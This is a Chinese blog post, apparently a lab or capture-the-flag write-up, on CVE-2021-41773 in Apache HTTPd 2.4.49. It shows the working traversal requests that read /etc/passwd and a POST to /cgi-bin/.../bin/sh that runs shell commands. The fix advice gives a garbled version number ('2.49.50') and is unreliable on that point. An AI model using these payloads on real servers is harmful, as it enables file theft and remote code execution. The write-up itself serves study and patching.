2022年06月28日   温氏效应   70 次浏览   暂无评论  

漏洞概述

Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

漏洞条件

  1. 配置目录遍历,并且开启cgi mode
  2. Apache HTTPd版本为2.4.49/2.4.50
  3. 存在cgi-binicons文件夹

穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的:<Directory />Require all denied</Directory>

注意:这里的/icons/必须是一个存在且可访问的目录

解题过程

  1. 打开靶场环境
Balloon trip
  1. 抓包,并将请求头改为:GET /icons/../../../../etc/passwd HTTP/1.1
Balloon trip

失败!对路径..进行url转码,拼接修改后添加:GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1,成功回显路径,说明存在漏洞。

Balloon trip
  1. 在服务端开启了cgicgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令,修改请求头:POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1,请求体添加echo; ls /,成功回显目录。
Balloon trip
  1. 输入echo;ls /tmp 获取flag

修复建议

升级到最新版的Apache HTTP Server 安全版本。

  1. 升级至2.49.50以上版本
  2. 关闭目录遍历功能
  3. 关闭cgi mode
上一篇:

共有 0 条评论

发表评论